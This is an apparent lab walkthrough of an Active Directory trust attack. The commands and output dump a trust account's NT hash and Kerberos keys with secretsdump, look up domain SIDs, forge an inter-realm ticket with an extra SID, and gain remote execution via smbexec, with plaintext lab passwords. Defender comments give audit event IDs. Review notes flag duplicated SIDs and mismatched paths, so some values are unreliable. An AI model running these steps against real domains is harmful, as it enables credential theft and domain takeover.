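# Step 1: read the keys of the NEWYORK$ account out of maryland.local.
# The "Copy" button label that the page extraction had fused onto the command
# has been removed; the command and its captured output are otherwise unchanged.
#
# The output confirms the DRSUAPI (directory replication) path was used, so the
# authenticating account (Carmelo.Anthony) holds replication rights on the domain.
# NEWYORK$ looks like the trust account maryland.local keeps for newyork.local;
# its NT hash is reused further down the page as the inter-realm key - TODO confirm.
#
# Defender view: replication requests from a host that is not a domain
# controller are the signal to alert on (Security event 4662 on the DC for the
# DS-Replication-Get-Changes / DS-Replication-Get-Changes-All rights, when
# Directory Service Access auditing is enabled). Audit which principals hold
# those rights; an ordinary user account should not.
secretsdump.py -just-dc-user 'NEWYORK$' maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
# Format is uid:rid:lmhash:nthash (see the banner above). The LM field is the
# well-known "empty LM hash" placeholder; the NT hash is the usable secret.
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:67bff53c935e4ba7e695b7744a4707f27519f330a10ce9ce88b3df1c51062c33
newyork$:aes128-cts-hmac-sha1-96:1057280d1cc1152e3054558b5244f6d3
newyork$:des-cbc-md5:01a864762326161f
[*] Cleaning up...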
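# Step 2: resolve the domain SIDs of both sides of the trust.
# The fused "Copy" button label has been removed from the first line.
#
# Both runs talk to the LSA RPC interface over the \pipe\lsarpc named pipe
# (see the StringBinding lines) as an authenticated user.
# Defender view: with Detailed File Share auditing enabled, access to the
# lsarpc pipe on IPC$ is logged as Security event 5145 on the target.
#
# NOTE(review): this label says newyork.local, but the credentials are given
# for north.newyork.local - confirm which domain the SID below belongs to.
# newyork.local SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
# NOTE(review): this second lookup targets the same host (192.168.56.10) as
# the first and returns an identical SID, while maryland.local was reached at
# 192.168.56.12 in the secretsdump step. Two distinct domains do not share a
# domain SID, so the value recorded here is presumably not maryland.local's
# own SID - verify before relying on it.
# Maryland.local SID
lookupsid.py -domain-sids maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.10 0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987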
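# Step 3: build a ticket offline for the krbtgt/newyork.local service, keyed
# with the NT hash of NEWYORK$ taken from the secretsdump output above.
# The fused "Copy" button label has been removed from the first line.
#
# NOTE(review): -domain-sid and -extra-sid carry the same value here, which is
# the SID both lookupsid runs on this page returned - see the host mismatch in
# that step and confirm the intended values.
#
# Defender view: nothing in this step touches a KDC, so the issuing domain
# logs no ticket request for the user named in it. SID filtering on the trust
# is the control that limits what the extra-SID field may carry across the
# trust boundary; verify it is enabled. Resetting the trust secret invalidates
# a key obtained as in step 1.
ticketer.py -nthash 3efc88864c2ab5cb43747ae949685db2 \
-domain-sid S-1-5-21-620482180-1620433373-1814187987 \
-domain maryland.local \
-extra-sid S-1-5-21-620482180-1620433373-1814187987 \
-spn krbtgt/newyork.local ballislife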
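# Step 4: point the Kerberos tooling at the credential cache (presumably the
# ballislife.ccache written by the ticketer step) and request a service
# ticket for cifs/nyc.newyork.local with it; -k -no-pass means the cached
# ticket is used instead of a password.
# The fused "Copy" button label has been removed from the first line.
#
# NOTE(review): the cache path here (/home/jefe/delegation/) differs from the
# /workspace/trusts/external/ path used in the smbexec step further down;
# the two snippets appear to come from different working directories.
#
# Defender view: this is the first step visible to newyork.local's KDC. The
# service-ticket request is logged there as Security event 4769; a request for
# a CIFS SPN by a principal from the trusted realm with no matching logon
# activity in that realm is worth correlating.
export KRB5CCNAME=/home/jefe/delegation/ballislife.ccache
getST.py -k -no-pass -spn cifs/nyc.newyork.local \
newyork.local/ballislife@newyork.local -debug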
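# Step 5: switch to the cache that holds the service ticket and use it for
# Kerberos-authenticated remote execution against nyc.newyork.local.
# The fused "Copy" button label has been removed from the first line.
#
# Defender view: smbexec.py drives the remote Service Control Manager, so the
# target records a new service installation (System event 7045, and Security
# event 4697 when that audit policy is on). A short-lived service whose
# binary path is a command interpreter line is the indicator to hunt for.
export KRB5CCNAME=/workspace/trusts/external/ballislife@newyork.local.ccache
smbexec.py -k -no-pass ballislife@nyc.newyork.local -debug
# List the tickets held in the cache named by KRB5CCNAME.
klist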